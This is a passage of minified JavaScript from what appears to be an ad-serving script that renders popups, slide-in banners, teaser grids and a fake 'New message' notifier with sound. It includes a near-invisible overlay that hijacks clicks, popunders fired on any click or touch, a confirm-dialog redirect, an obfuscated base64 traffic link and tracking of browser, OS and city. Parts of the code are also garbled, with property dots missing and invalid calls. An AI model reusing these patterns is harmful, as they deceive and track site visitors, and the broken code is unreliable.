= S.plugins["Shockwave Flash"].description) && !(typeof S.mimeTypes != t && S.mimeTypes[na] && !S.mimeTypes[na].enabledPlugin))vb = y, ab = T, D = D.replace(/^.*\s+(\S+\s+\S+$)/, "$1"), ia[0] = parseInt(D.replace(/^(.*)\..*$/, "$1"), 10), ia[1] = parseInt(D.replace(/^.*\.(.*)\s.*$/, "$1"), 10), ia[2] = /[a-zA-Z]/.test(D) ? parseInt(D.replace(/^.*[a-zA-Z]+(.*)$/, "$1"), 10) : 0 } else if (typeof G.ActiveXObject != t)try { var wb = new ActiveXObject("ShockwaveFlash.ShockwaveFlash"); if (wb && (D = wb.GetVariable("$version")))ab = y, D = D.split(" ")[1].split(","), ia = [parseInt(D[0], 10), parseInt(D[1], 10), parseInt(D[2], 10)] } catch (Vb) { } n = {j: Qb, n: ia, i: Tb, c: ab, e: Rb, R: Sb}; nj && ((typeof u.readyState != t && "complete" == u.readyState || typeof u.readyState == t && (u.getElementsByTagName("body")[0] || u.body)) && Z(), V || (typeof u.addEventListener != t && u.addEventListener("DOMContentLoaded", Z, T), nc && ne && (u.attachEvent("onreadystatechange", function () { "complete" == u.readyState && (u.detachEvent("onreadystatechange", arguments.callee), Z()) }), G == top && function () { if (!V) { try { u.La.doScroll("left") } catch (a) { setTimeout(arguments.callee, 0); return } Z() } }()), ni && function () { V || (/loaded|complete/.test(u.readyState) ? Z() : setTimeout(arguments.callee, 0)) }(), hb(Z))); nc && ne && r.attachEvent("onunload", function () { for (var a = Y.length, b = 0; b < a; b++)Y[b][0].detachEvent(Y[b][1], Y[b][2]); a = ma.length; for (b = 0; b < a; b++)eb(ma[b]); for (var c in n)n[c] = z; n = z; for (var d in gw)gw[d] = z; gw = z }); I.prototype = {ea: {h: "", link: "aHR0cDovL3dpemFyZC10cmFmZnN0b2NrLmNvbS8/dXRtX3NvdXJjZT1vdXJiYW5uZXImdXRtX21lZGl1bT1iYW5uZXImdXRtX2NhbXBhaWduPWJhbm5lcl9yZWc\x3d"}, Ia: 3E3, ia: "", wa: "", xa: "", ib: "", Da: "", U: "left:-10000px;top:-10000px;height:1px;width:1px;position:absolute;", W: "", ca: "", Z: T, Ca: 2, ja: 0, ka: 0, V: [], f: {}, b: function (a, b, c, d) { a.addEventListener ? a.addEventListener(b, c, d) : a.attachEvent("on" + b, c) }, K: function (a) { a = a || event; a.cancelBubble = y; a.stopPropagation && a.stopPropagation() }, ba: function (a, b, c, d) { var e = this; if (a.isDefaultClose || !this.Z && a.stubSrc) { d = d || -12; c = c || b; var f = k.createElement("span"); f.style.cssText = this.ia.replace("${offsetTop}", d); f.onclick = function (b) { eK(b); e.close(a, c) }; if (a.isDefaultClick || !this.Z && a.stubSrc)d = k.createElement("a"), d.style.cssText = this.Da, d.target = "_blank", d.href = a.trackingDomain + gg(a.clickUri + eG()), d.onclick = function (b) { eK(b); this.href = a.trackingDomain + gg(a.clickUri + eG()); e.na(c) }, b.appendChild(d); setTimeout(function () { b.appendChild(f) }, this.Ia) } else r.hide = function () { e.close(a, ef) } }, H: function (a, b, c, d) { c = c || "bottom"; d = d || "right"; b.showLogo && (b = k.createElement("a"), b.href = gL(this.ea.link), b.target = "_blank", b.style.cssText = "z-index:99;position:absolute;" + c + ":-15px;width:100%;height:15px;left:0;right:0; background:#fff url(" + this.ea.h + ") no-repeat " + d + " top;", a.appendChild(b)) }, J: function (a, b) { gX(b.impDomain + gg(b.trackShowUri)).style.cssText = this.U }, G: function () { return this.ja > this.Ca || 0 < this.ka || xaisMobile ? "" : "\x26rej\x3d1" }, w: {eb: function (a, b, c, d) { if (nj && a && b) { var e = {}; e.id = a; e.qa = b; eO = c; e.fa = d; P[P.length] = e; U(a, T) } else d && d({success: T, id: a}) }, Sa: function (a) { if (nj)return Ja(a) }, N: function (a, b, c, d, e, f, g, h, j, k) { var A = {success: T, id: b}; nj && !(ni && 312 > ni) && a && b && c && d && e ? (U(b, T), ib(function () { c += ""; d += ""; var q = {}; if (j && typeof j === M)for (var B in j)q[B] = j[B]; q.data = a; q.width = c; q.height = d; B = {}; if (h && typeof h === M)for (var r in h)B[r] = h[r]; if (g && typeof g === M)for (var F in g)Bs = typeof Bs != t ? Bs + ("\x26" + F + "\x3d" + g[F]) : F + "\x3d" + g[F]; if (la(e))r = Ea(q, B, b), q.id == b && U(b, y), A.success = y, AS = r; else { if (f && Ia()) { q.data = f; Ga(q, B, b, k); return } U(b, y) } k && k(A) })) : k && k(A) }, kb: function () { cb = T }, W: n, Ra: function () { return{$a: nn[0], bb: nn[1], fb: nn[2]} }, va: la, Ka: function (a, b, c) { if (nj)return Ea(a, b, c) }, hb: function (a, b, c, d) { nj && Ia() && Ga(a, b, c, d) }, gb: function (a) { nj && eb(a) }, Ja: function (a, b, c, d) { nj && db(a, b, c, d) }, Fa: ib, Ha: hb, Ta: function (a) { var b = u.location.search || u.location.hash; if (b) { /\?/.test(b) && (b = b.split("?")[1]); if (a == z)return bb(b); for (var b = b.split("\x26"), c = 0; c < b.length; c++)if (b[c].substring(0, b[c].indexOf("\x3d")) == a)return bb(b[c].substring(b[c].indexOf("\x3d") + 1)) } return"" }, Pa: function () { if (oa) { var a = J(gb); a && ea && (a.parentNode.replaceChild(ea, a), pa && (U(pa, y), nc && ne && (ea.style.display = "block")), Ha && Ha(fb)); oa = T } }}, N: function (a, b, c, d, e, f) { this.wN(this.ab(a, b, c), d, e, f, "10.0.0", "", T, this.V, T) }, ab: function (a, b, c) { return xaimgDomain + a + "?closeid\x3d" + b + "\x26link1\x3d" + c + this.Aa() }, Aa: function () { return"\x26keywords\x3d" + encodeURIComponent(xakeywords) + "\x26browsername\x3d" + encodeURIComponent(xauaFamilyName) + "\x26browserversion\x3d" + xauaVersion + "\x26os\x3d" + encodeURIComponent(xaosName) + "\x26countryid\x3d" + xacountryId + "\x26district\x3d" + encodeURIComponent(xadistrict) + "\x26region\x3d" + encodeURIComponent(xaregion) + "\x26city\x3d" + encodeURIComponent(xacity) }, B: function (a) { return a.replace("{keywords}", xrkeywords || "").replace("{browsername}", xruaFamilyName || "").replace("{browserversion}", xruaVersion || "").replace("{os}", xrosName || "").replace("{countryid}", xrcountryId || "").replace("{district}", xrdistrict || "").replace("{region}", xrregion || "").replace("{city}", xrcity || "") }, Ma: function (a, b, c, d, e) { a = g.Ga(a + (-1 == a.indexOf("?") ? "?" : "\x26") + "clickUrl\x3d" + b + this.Aa(), c); a.style.cssText = "width:" + d + "px;height:" + e + "px;border:none;"; a.scrolling = "no" }, ya: function (a) { var b = a.clickUri.replace("clk", "cl"); a = (a.trackingDomain || a.teasers[0].trackingDomain) + gg(b); gX(a).style.cssText = this.U }, close: function (a, b) { this.ya(a); this.na(b) }, na: function (a) { a && k.body.removeChild(a) }, t: function (a) { var b = this; this.b(k, "mousemove", function () { b.ja++ }, T); this.b(k, "scroll", function () { b.ka++ }, T); this.ea.h = xascriptsDomain + "img/adv.png"; this.Z = this.w.va("1"); g.log(a); this.W = navigator.userAgent.toLowerCase(); this.ca = -1 < this.W.indexOf("opera"); this.za = !this.ca && -1 < this.W.indexOf("msie"); this.wa = xascriptsDomain + "img/close.png"; this.xa = xascriptsDomain + "img/close_ie.gif"; this.ia = "z-index:101;position:absolute;top:${offsetTop}px;right:-12px;background:url(" + this.wa + ") no-repeat 50%;width:30px;height:30px;cursor:pointer;* background:url(" + this.xa + ");"; this.ib = xascriptsDomain + "img/blank.gif"; this.Da = "background:white;filter:progid:DXImageTransform.Microsoft.Alpha(opacity\x3d1);-moz-opacity:0.01;-khtml-opacity:0.01;opacity:0.01;cursor:pointer;left:0px;top:0px;right:0px;bottom:0px;width:100%;height:100%;position:absolute;"; this.V.allowScriptAccess = "always"; this.V.quality = "high"; this.V.wmode = "transparent" }, p: function () { g.log("Method not implemented") }, M: function (a, b) { var c = k.createElement("div"); a.appendChild(c); c.style.width = b.width + "px"; c.style.height = b.height + "px"; !this.Z && b.stubSrc && (c.style.background = "url(" + xaimgDomain + b.stubSrc + ") no-repeat 50% 50%"); if (b.iframeUrl)this.Ma(b.iframeUrl, encodeURIComponent(b.trackingDomain + gg(b.clickUri)), c, b.width, b.height); else if (g.Oa(b.src, ".swf")) { var d = k.createElement("div"); d.id = "swf" + (new String(Math.random())).slice(2); c.appendChild(d); this.N(b.src, d.id, encodeURIComponent(b.trackingDomain + gg(b.clickUri)), d.id, b.width, b.height) } else c.style.background = "url(" + xaimgDomain + b.src + ") no-repeat 50% 50%" }}; E(xa, I); xa.prototype.p = function (a) { var b = this; bt(a); var c = gz("div"); bf = c; bM(c, a); bH(c, a, "bottom", "right"); bJ(c, a); var d = b.$(a.width, a.height), e = "z-index:9999;position:fixed;top:50%;left:50%;margin-top:-" + a.height / 2 + "px;margin-left:-" + a.width / 2 + "px;width: " + a.width + "px;height: " + a.height + "px;"; gv() || (e = e.replace("fixed", "absolute"), bb(r, "scroll", function () { c.style.top = gq() + d.top + "px" }), bb(r, "resize", function () { var d = b.$(a.width, a.height); c.style.top = gq() + d.top + "px" })); c.style.cssText = e; this.ba(a, c, c) }; xa.prototype.$ = function (a, b) { return{left: (g.ua() - a) / 2, top: (gk() - b) / 2} }; E(Ta, I); Ta.prototype.p = function (a) { function b() { var b = setInterval(function () { f < parseInt(a.height, 10) + d ? (f += 10, w.style.top = f + "px") : (clearInterval(b), setTimeout(c, 1E3)) }, 10) } function c() { var a = setInterval(function () { 0 < f ? (f -= 10, w.style.top = f + "px") : (clearInterval(a), setTimeout(b, e)) }, 20) } var d = a.showLogo ? 24 : 18, e = 15E3, f = a.height, p = 0, h = 6 == a.bannerPosition ? "left" : "right"; this.t(a); var j = gz("div"); this.f = j; var w = k.createElement("div"); j.appendChild(w); this.M(w, a); this.H(w, a, "top", "left"); this.J(w, a); h = "z-index:9999;padding:" + d + "px 9px 0 0;overflow:hidden;position:fixed;bottom:0;" + h + ": 0px;width: " + a.width + "px;height: " + a.height + "px;"; gv() || (h = h.replace("fixed", "absolute"), h += "bottom:auto;top:" + (gk() - a.height - d) + "px;", this.b(r, "scroll", function () { j.style.top = gq() + gk() - a.height + "px" }), this.b(r, "resize", function () { j.style.top = gq() + gk() - a.height - d + "px" })); j.style.cssText = h; w.style.cssText = "position:relative;top: " + a.height + "px;"; this.ba(a, w, j, a.showLogo ? -20 : -12); a.animate ? setTimeout(function () { var b = setInterval(function () { Math.abs(parseInt(banner.style.top, 10)) > a.height ? w.style.top = (p += 20) + "px" : clearInterval(b) }, 20) }, 1E3) : c() }; E(Ua, I); Ua.prototype.p = function (a) { this.t(a); var b = gz("div"); this.f = b; this.M(b, a); this.H(b, a, "bottom", "right"); this.J(b, a); var c = "z-index:9999;position:fixed;top:0px;left: 50%;width: " + a.width + "px;height: " + a.height + "px;margin-left:-" + a.width / 2 + "px"; gv() || (c = c.replace("fixed", "absolute"), this.b(r, "scroll", function () { b.style.top = gq() + "px" })); b.style.cssText = c; this.ba(a, b, b, 3) }; E(Va, I); Va.prototype.p = function (a) { this.t(a); var b = gz("div"); this.f = b; this.M(b, a); this.H(b, a, "top", "left"); this.J(b, a); var c = "z-index:9999;position:fixed;left: 50%;bottom:0; width: " + a.width + "px;height: " + a.height + "px;margin-left:-" + a.width / 2 + "px"; gv() ? this.b(r, "resize", function () { b.style.top = gk() - a.height + "px" }) : (c = c.replace("fixed", "absolute"), c += "bottom:auto;top:" + (gk() - a.height) + "px;", this.b(r, "scroll", function () { b.style.top = gq() + gk() - a.height + "px" }), this.b(r, "resize", function () { b.style.top = gq() + gk() - a.height + "px" })); b.style.cssText = c; this.ba(a, b, b, a.showLogo ? -20 : -12) }; E(ca, I); ca.prototype.p = function (a) { function b() { if (!c && (j.ja > j.Ca || 0 < j.ka) && 1E3 <= (new Date).getTime() - d) { c = y; var b = function (a) { l = setInterval(function () { if (h[a] && p[a] < f * F)p[a] += 5, h[a].style.top = p[a] + "px"; else { clearInterval(l); var c = a + 1; if (c < h.length)setTimeout(function () { b(c) }, h[a] ? 4E3 : 0); else { for (var d = 0; d < h.length; d++)h[d] && (h[d].style.top = f * h.length + 10); setTimeout(function () { j.ha(c, h[0] && "true" == h[0]); e(0) }, h[a] ? 1E4 : 0) } } }, 10) }, e = function (a) { l = setInterval(function () { if (h[a] && p[a] > f * (F - 1))for (var c = a; 0 <= c; c--)h[c] && (p[c] -= 5, h[c].style.top = p[c] + "px"); else { clearInterval(l); var d = a + 1; d < h.length ? setTimeout(function () { j.ha(d, h[d] && "true" == h[d]); e(d) }, h[a] ? 4E3 : 0) : setTimeout(function () { b(0) }, h[a] ? 8E3 : 0) } }, 20) }, F = 0, n = function () { for (var a = F = 0; a < h.length; a++)h[a] != z && F++ }, m = function (b, c, d) { jfremoveChild(h[c]); jK(b); h[c] = z; n(); d && j.ya(a); b = T; for (d = c; d < h.length; d++)h[d] && (!b && p[d] >= f * h.length) && (b = y, p[d] = p[c], h[d].style.top = p[d] + "px"); if (!b) { var e = f; jfstyle.overflow = "visible"; var k = setInterval(function () { if (0 < e) { e -= 5; for (var a = c; 0 <= a; a--)h[a] && (p[a] += 5, h[a].style.top = p[a] + "px") } else jfstyle.overflow = "hidden", clearInterval(k) }, 10) } jfstyle.height = f * F + "px"; gv() || (jfstyle.top = gq() + gk() - f * F + "px"); for (d = 0; d < h.length; d++)h[d] && (p[d] -= f, h[d].style.top = p[d] + "px") }; jf = gz("div"); var u = a.trackingDomain + gg(a.clickUri.replace("/?", "")), l; jJ(jf, a); for (var x = 0; x < w.length; x++) { p.push(f * w.length); var t = k.createElement("div"); t.id = "vid-" + x; t.className = "vmcontainer"; var v = k.createElement("div"); t.setAttribute("mute", a.mute); t.onmouseover = function () { this.className += " hover" }; t.onmouseout = function () { this.className = this.className.replace(" hover", "") }; var ja = k.createElement("div"); ja.style.cssText = "position:relative;"; ja.innerHTML = "\x3cspan\x3e" + w[x].header + "\x3c/span\x3e"; var ka = k.createElement("a"); ka.id = "vclose-" + x; var C = k.createElement("a"); ka.className = "vclose"; ja.appendChild(ka); ka.appendChild(C); v.appendChild(ja); C = k.createElement("div"); C.style.cssText = "float:left;margin:0 10px 0 10px;border-radius:3px;overflow:hidden;box-shadow:0 1px 2px rgb(17, 17, 17);"; v.appendChild(C); g.pa() || (v.style.cssText = "padding:5px 15px;"); var D = k.createElement("div"), E = k.createElement("style"), G = k.getElementsByTagName("head")[0]; E.type = "text/css"; E.styleSheet ? E.styleSheet.cssText = A : E.appendChild(k.createTextNode(A)); G.appendChild(E); D.innerHTML = '\x3cspan class\x3d"text-link"\x3e\x3ca href\x3d"#" \x3e' + w[x].title + "\x3c/a\x3e\x3c/span\x3e" + w[x].description; v.appendChild(D); jM(C, a); jfappendChild(t); t.appendChild(v); h.push(t); ka.onclick = function (a) { var b = parseInt(this.id.replace("vclose-", "")); m(a, b, y) }; t.onclick = function (a) { jK(a); var b = parseInt(this.id.replace("vid-", "")); m(a, b, T); r.open(u) }; ja.style.cssText = "position:relative;font-size:13px;height:19px;line-height:19px;color:white;padding:10px 10px 3px;font-weight:bold;"; t.style.cssText = q } n(); x = "z-index:9999;overflow:hidden;font-family: tahoma,arial,verdana,sans-serif,Lucida Sans;font-size: 11px;z-index:9999; position:fixed;bottom:0;left: 10px;width:345px;height:" + f * h.length + "px;"; gv() || (x = x.replace("fixed", "absolute"), x += "bottom:auto;top:" + (gk() - f * h.length) + "px;", jb(r, "scroll", function () { jfstyle.top = gq() + gk() - F * f + "px" }), jb(r, "resize", function () { jfstyle.top = gq() + gk() - F * f + "px" })); jfstyle.cssText = x; gv() || (jfstyle.top = gq() + gk() - F * f + "px"); setTimeout(function () { 0 < h.length && (j.ha(0, h[0] && "true" == h[0]), e(0)) }, 3E3) } } var c = T, d = (new Date).getTime(), e = "vm" + (new Date).getTime(), f = g.pa() ? 105 : 125, p = [], h = [], j = this, w = j.Qa(a, e); jt(a); var A = '.vclose {width: 23px; height: 23px; display: block; filter:progid:DXImageTransform.Microsoft.Alpha(opacity\x3d0);-moz-opacity: 0;-khtml-opacity:0;opacity:0;position:absolute; right:10px; top:10px; background: url("' + xascriptsDomain + 'img/notifier_close_ie.png") no-repeat scroll 0 0;} .vclose a {display:none; width:7px; height:7px;margin:8px; background:url(' + xascriptsDomain + "/img/notifier_close.gif)}.vclose:hover a{display:block; filter:progid:DXImageTransform.Microsoft.Alpha(opacity\x3d60);-moz-opacity:.6;-khtml-opacity:.6;opacity:.6;}.vmcontainer:hover .vclose:hover{filter:progid:DXImageTransform.Microsoft.Alpha(opacity\x3d100);-moz-opacity:1;-khtml-opacity:1;opacity:1;}.vmcontainer:hover .vclose, .vmcontainer.hover .vclose{filter:progid:DXImageTransform.Microsoft.Alpha(opacity\x3d60);-moz-opacity:.6;-khtml-opacity:.6;opacity:.6;} .text-link {padding-right:10px;} .text-link a {color:rgb(177, 218, 255);font-weight:bold;text-decoration:none;}.text-link a:hover {text-decoration:underline;}", e = 'height:130px;width:350px; background: url("' + xascriptsDomain + 'img/notifier_back.png") center center no-repeat; ', q = "left:0;color:white;margin:0 0 10px 0;" + (g.pa() ? "height:95px;width:320px;border-radius: 5px 5px 5px 5px;box-shadow: 0pt 2px 15px rgb(0, 0, 0);text-shadow: 0px 1px 0px rgb(38, 38, 38);background:rgba(0,0,0,0.75);" : e) + "position:absolute;top: " + (f * w.length + 10) + "px;"; this.b(k, "mousemove", function () { b() }, T); this.b(k, "scroll", function () { b() }, T) }; ca.prototype.T = z; ca.prototype.Qa = function (a, b) { var c = [], d = a.title.split("{splitter}"), e = a.description.split("{splitter}"); a.windowHeader || (a.windowHeader = "\u041d\u043e\u0432\u043e\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435"); for (var f = a.windowHeader.split("{splitter}"), k = Math.max(f.length, Math.max(d.length, e.length)), h = 0; h < k; h++) { var j = {}; j.title = this.B(h < d.length ? d[h] : d[0]); j.description = this.B(h < e.length ? e[h] : e[0]); j.header = this.B(h < f.length ? f[h] : f[0]); "" == j.header && (j.header = "\u041d\u043e\u0432\u043e\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435"); j.wrapperId = b; j.id = b + h + 1; j.index = h; c.push(j) } g.log(c); return c }; ca.prototype.ha = function (a, b) { if (b == T)if (gQ()) { var c = k.createElement("bgsound"); c.src = xascriptsDomain + "img/bb2.mp3"; c.loop = "1"; k.body.appendChild(c) } else this.T && (c = k.getElementById(this.T)) && this.f && this.f.removeChild(c), c = k.createElement("div"), this.T = "vkmsound" + a, c.id = this.T, this.f.appendChild(c), gwN(xascriptsDomain + "img/mp3player.swf?file\x3d" + xascriptsDomain + "img/bb2.mp3\x26startplay\x3dtrue", this.T, "1", "1", "10.0.0", z, z, this.V) }; E(Wa, I); Wa.prototype.p = function (a) { this.t(a); var b = {limit: a.limit, period: a.period, limitName: "__trflimit", periodName: "__trfmon"}, c = T; if (g.ga(b)) { var d = this, e = navigator.userAgent.toLowerCase(); this.b(k, -1 < e.indexOf("iphone") || -1 < e.indexOf("ipad") ? "touchstart" : "click", function () { g.ga(b) && !c && (c = y, g.log(a.trackingDomain + gg(a.clickUri + dG())), g.ma.call(d, a.trackingDomain + gg(a.clickUri + dG()), y, "_blank", ""), g.Ea(b)) }); this.J(k.body, a) } }; E(ya, I); ya.prototype.p = function (a) { var b = {limit: a.limit, period: a.period, limitName: "__trfpoplimit", periodName: "__trfmonpop"}; this.t(a); if (g.ga(b)) { var c = gz("div"), d = k.createElement("div"); c.appendChild(d); this.M(d, a); var e = this; ef = c; d.onclick = function (d) { g.ma(a.trackingDomain + gg(a.clickUri + eG()), y, "_blank", ""); g.Ea(b); eK(d); e.na(c) }; this.H(c, a, "bottom", "right"); this.J(c, a); var f = this.$(a.width, a.height), d = "z-index:9999;cursor:pointer;position:fixed;top: " + f.top + "px;left: " + f.left + "px;width: " + a.width + "px;height: " + a.height + "px;"; gv() || (d = d.replace("fixed", "absolute"), this.b(r, "scroll", function () { c.style.top = gq() + f.top + "px" })); c.style.cssText = d; d = k.createElement("span"); d.style.cssText = this.ia.replace("${offsetTop}", "-20"); e = this; d.onclick = function (b) { eK(b); g.ma.call(e, a.trackingDomain + gg(a.closeUri), y, "_blank", ""); e.close(a, c) }; c.appendChild(d) } }; ya.prototype.$ = function (a, b) { return{left: (g.ua() - a) / 2, top: (gk() - b) / 2} }; E(Xa, I); Xa.prototype.p = function (a) { this.t(a); confirm(a.bannerText) && (r.location = a.trackingDomain + gg(a.clickUri)) }; E(Ya, I); Ya.prototype.p = function (a) { r.globalInfo.mredRendered || (r.globalInfo.mredRendered = y, g.log("Rendering m redir"), g.da(a.trackingDomain, a.clickUri)) }; E(da, I); da.prototype.r = ""; da.prototype.p = function (a) { function b(a, b) { a.style.cssText = jI[b]; db(a, "mouseover", function () { a.style.cssText = jP[b]; "text" == b && jo([a]) }, T); db(a, "mouseout", function () { a.style.cssText = jI[b]; jo([a]) }, T) } function c(a, b) { db(a, "mouseover", function () { b.style.cssText = jPsPText; "TD" == a.tagName && jo([b]) }, y); db(a, "mouseout", function () { b.style.cssText = jIsPText; jo([b]) }, y) } this.t(a); var d = this, e = k.createElement("table"), f = k.createElement("tbody"), p = k.createDocumentFragment(), h = k.createElement("img"), j = this, w = s, A; if (!w) { w = {}; w.size = parseInt(a.bannerSize, 10) + 2 * parseInt(a.imgBorderWidth, 10); var q = w.size + parseInt(a.imgMarginSize, 10); switch (a.orientation) { case "over": w.margin = "0"; wC = "0 0 " + a.imgMarginSize + "px"; wm = "none"; wl = "center"; wA = {top: -(a.bannerSizeOnmouseover - a.bannerSize), left: -(a.bannerSizeOnmouseover - a.bannerSize) / 2}; break; case "left": w.margin = "0 0 0 " + q + "px"; wC = "0 -" + q + "px 0 0"; wm = "left"; wl = "left"; wA = {top: -(a.bannerSizeOnmouseover - a.bannerSize) / 2, left: -(a.bannerSizeOnmouseover - a.bannerSize)}; break; case "right": w.margin = "0 " + q + "px 0 0", wC = "0 0 0 -" + q + "px", wm = "right", wl = "left", wA = {top: -(a.bannerSizeOnmouseover - a.bannerSize) / 2, left: 0} } } A = w; var B = gQ() ? "display:inline;zoom:1;" : "display:inline-block;", q = k.getElementById("wzblock" + a.blockId), n = parseInt(a.textSize, 10), m = n + (parseInt(a.textMouseOnTextSize, 10) - parseInt(a.textSize, 10)), l = n + (parseInt(a.textMouseOnTeaserSize, 10) - parseInt(a.textSize, 10)); this.d = parseInt(a.textDivHeight, 10); jI = {table: "table-layout:fixed;background:" + a.background + ";border-collapse:separate;border-spacing:" + a.blockMarginVert + "px " + a.blockMarginHoriz + "px;width:" + a.width + a.widthUnit + ";border:" + a.borderWidth + "px " + a.borderType + " " + a.borderColor + ";", D: "vertical-align:top;background:" + a.cellBackground + ";border:" + a.cellBorderWidth + "px " + a.cellBorderType + " " + a.cellBorderColor + ";cursor:pointer;text-align:" + Al + ";width:" + a.width / a.horizCount + a.widthUnit + ";", u: "z-index:1;margin:" + AC + ";position:relative;" + B + ";height:" + A.size + "px;width:" + A.size + "px;float:" + Am + ";", h: "z-index:1;position:absolute;top:0;left:0;width:" + a.bannerSize + "px;height:" + a.bannerSize + "px;border:" + a.imgBorderWidth + "px " + a.imgBorderType + " " + a.imgBorderColor + ";", text: "margin:" + A.margin + ";cursor:pointer;float:" + Am + ";height:" + (0 != this.d ? this.d + "px" : "auto") + ";text-decoration:" + ("false" != a.textFontUnderline ? "underline" : "none") + ";display:block;font-weight:" + ("false" != a.textFontBold ? "700" : "100") + ";font-size:" + n + a.textSizeUnit + ";font-family:" + a.textFont + ";color:" + a.textColor + ";", sPText: "margin:" + A.margin + ";cursor:pointer;float:" + Am + ";height:" + (0 != this.d ? this.d + "px" : "auto") + ";text-decoration:" + ("false" != a.textFontUnderline ? "underline" : "none") + ";display:block;font-weight:" + ("false" != a.textFontBold ? "700" : "100") + ";font-size:" + n + a.textSizeUnit + ";font-family:" + a.textFont + ";color:" + a.textColor + ";"}; jP = {table: "table-layout:fixed;background:" + a.backgroundOnmouseover + ";border-collapse:separate;border-spacing:" + a.blockMarginVert + "px " + a.blockMarginHoriz + "px;width:" + a.width + a.widthUnit + ";border:" + a.borderWidth + "px " + a.borderType + " " + a.borderColor + ";", D: "vertical-align:top;background:" + a.cellBackgroundOnmouseover + ";border:" + a.cellBorderWidth + "px " + a.cellBorderType + " " + a.cellBorderColor + ";cursor:pointer;text-align:" + Al + ";width:" + a.width / a.horizCount + a.widthUnit + ";", u: "z-index:5;margin:" + AC + ";position:relative;" + B + ";height:" + A.size + "px;width:" + A.size + "px;float:" + Am + ";", h: "z-index:10;cursor:pointer;position:absolute;top:" + wAtop + "px;left:" + wAleft + "px;height:" + a.bannerSizeOnmouseover + "px;width:" + a.bannerSizeOnmouseover + "px;border:" + a.imgBorderWidth + "px " + a.imgBorderType + " " + a.imgBorderColor + ";", text: "margin:" + A.margin + ";cursor:pointer;float:" + Am + ";height:" + (0 != this.d ? this.d + "px" : "auto") + ";text-decoration:" + ("false" != a.textMouseOnTextFontUnderline ? "underline" : "none") + ";display:block;font-weight:" + ("false" != a.textMouseOnTextFontBold ? "700" : "100") + ";font-size:" + m + a.textMouseOnTextSizeUnit + ";font-family:" + a.textMouseOnTextFont + ";color:" + a.textMouseOnTextColor + ";", sPText: "margin:" + A.margin + ";cursor:pointer;float:" + Am + ";height:" + (0 != this.d ? this.d + "px" : "auto") + ";text-decoration:" + ("false" != a.textMouseOnTeaserFontUnderline ? "underline" : "none") + ";display:block;font-weight:" + ("false" != a.textMouseOnTeaserFontBold ? "700" : "100") + ";font-size:" + l + a.textMouseOnTeaserSizeUnit + ";font-family:" + a.textMouseOnTeaserFont + ";color:" + a.textMouseOnTeaserColor + ";"}; this.ta = function () { 0 == this.d && (this.d = "over" == a.orientation ? 35 : a.bannerSize) }; if (!q) { q = k.getElementsByTagName("script"); A = RegExp("bid\x3d(" + a.blockId + ")(\\D|.{0}$)"); w = 0; for (B = q.length; w < B; w += 1)if (-1 != q[w].src.indexOf(xarotatorDomain) && A.test(gL(q[w].src)) || -1 != q[w].text.indexOf(xarotatorDomain) && -1 != q[w].text.indexOf(xatrsKey)) { A = k.createElement("div"); A.id = "wzblock" + a.blockId; q[w].parentNode.insertBefore(A, q[w].nextSibling); break } } q = k.getElementById("wzblock" + a.blockId); q.style.display = "block"; r.globalInfo.arrBlocks = []; this.data = a; p.appendChild(e); b(e, "table"); for (w = A = 0; w < a.vertCount; w += 1) { B = k.createElement("tr"); for (n = 0; n < a.horizCount; n += 1) { var m = {D: k.createElement("td"), h: k.createElement("img"), text: k.createElement("span"), u: k.createElement("span")}, l = a.teasers[A], u = k.createElement("span"), t = k.createElement("a"); A++; for (var v in m)b(m[v], v), "td" == v && c(m[v], m.text); var C = l.trackingDomain; mhsrc = xaimgDomain + l.src; mhtitle = this.B(l.title); mhalt = this.B(l.title); mhsetAttribute("clickUri", l.clickUri); gQ() && (mhonclick = function () { r.open(C + gg(this.getAttribute("clickUri") + dG())) }); u.innerHTML = this.B(l.title); m.text.className = "wzTextSpan"; m.text.appendChild(u); r.globalInfo.arrBlocks.push(m.text); muappendChild(mh); t.target = "_blank"; t.href = l.trackingDomain + gg(l.clickUri); t.style.cssText = "text-decoration:none;display:block;"; t.setAttribute("clickUri", l.clickUri); t.onclick = function () { this.href = C + gg(this.getAttribute("clickUri") + dG()) }; t.appendChild(mu); t.appendChild(m.text); mDappendChild(t); B.appendChild(mD) } f.appendChild(B); e.appendChild(f) } h.src = a.teasers[0].impDomain + gg(a.trackShowUri); h.style.cssText = "left:-10000px;top:-10000px;height:1px;width:1px;position:absolute;"; p.appendChild(h); q.appendChild(p); this.o(); if ("px" != this.r.widthUnit) { var E = e.offsetWidth; r.onresize = function () { 10 < Math.abs(E - e.offsetWidth) && (jo(), E = e.offsetWidth) } } }; da.prototype.o = function (a) { if (!this.data.dontResizeFonts) { 0 == parseInt(this.d, 10) && this.ta(); a = a || r.globalInfo.arrBlocks; for (var b = 0, c = a.length; b < c; b += 1)if ("SPAN" == a[b].tagName || "TD" == a[b].tagName) { var d = a[b].getElementsByTagName("span")[0]; if ("undefined" !== typeof d)if (d.offsetHeight > parseInt(this.d, 10))for (; a[b].style.fontSize && d.offsetHeight > parseInt(this.d, 10) && 0 < parseInt(a[b].style.fontSize, 10);)a[b].style.fontSize = parseInt(a[b].style.fontSize, 10) - 1 + this.data.textSizeUnit; else for (; a[b].style.fontSize && d.offsetHeight < parseInt(this.d, 10) && parseInt(a[b].style.fontSize, 10) < parseInt(this.data.textSize, 10);)a[b].style.fontSize = parseInt(a[b].style.fontSize, 10) + 1 + this.data.textSizeUnit } } }; E(ga, da); ga.prototype.p = function (a) { function b() { var a = r.scrollY || j.scrollTop || k.body.scrollTop; m <= a && !n ? (clearInterval(q), q = s, f.style.display = "block", do(), n = setInterval(function () { 0 > parseInt(h.style[B], 10) ? h.style[B] = parseInt(h.style[B], 10) + 20 + "px" : (h.style[B] = "0px", clearInterval(n), n = s) }, 20)) : m > a && !q && c() } function c(b) { clearInterval(n); n = s; q = setInterval(function () { parseInt(h.style[B], 10) > 0 - d.width ? h.style[B] = parseInt(h.style[B], 10) - 20 + "px" : (h.style[B] = 0 - d.width + "px", clearInterval(q), q = s, b ? d.close(a, f) : f.style.display = "none") }, 20) } this.t(a); var d = this, e = "wzScroller" + (new Date).getTime(), f = k.createElement("div"), p = k.createElement("div"), h = k.createElement("div"), j = k.documentElement, m = 200, n, q, B, l = "z-index:10000;overflow:hidden;bottom:0;height:100%;width:100%;background:none;", u = "margin:20px 0 0;position:absolute;top:0;width:100%;height:100%;", t = "position:absolute;width:100%;height:20px;top:-20px;"; this.r = a; switch (a.bannerPosition) { case 6: B = "left"; l += "left: 0;"; u += "padding:0 